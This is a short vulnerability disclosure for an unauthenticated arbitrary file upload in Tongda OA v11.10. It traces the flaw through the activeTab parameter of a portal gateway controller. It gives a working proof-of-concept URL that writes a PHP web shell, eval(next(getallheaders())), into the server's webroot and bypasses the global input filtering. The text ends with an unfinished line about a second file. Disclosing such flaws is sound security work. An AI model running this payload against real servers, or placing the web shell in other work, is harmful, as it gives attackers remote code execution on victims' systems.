tongda.md

Tongda OA v11.10 has unauthorized arbitrary file upload vulnerability

official website:https://www.tongda2000.com/

version:v11.10

1. The actionGetdata() method exists in the code general\appbuilder\modules\portal\controllers\GatewayController.php, where the activeTab parameter is controllable. In line 2018 the activeTab argument is in the GetData method.

In the GetData() method, query the id argument by findall to see if the array exists, and if the queried id does, enter the if statement on line 21. So the $attribute argument in line 38 is controllable, causing the array to be closed and thus written to the file via fwrite().

2. The vulnerability reappears

poc

http://url/general/appbuilder/web/portal/gateway/getdata?activeTab=%e5%27,1%3d%3Efwrite(fopen(%22C:/YAOA/webroot/general/1.php%22,%22w+%22),%22%3C?php%20eval(next(getallheaders()));%22))%3b/*&id=266&module=Carouselimage

Write php files with fwrite(fopen()) through array closure, and bypass global filtering with no parameter.

<? php eval(next(getallheaders()));

Write the 2.php file with no argument, and the file contents are as follows.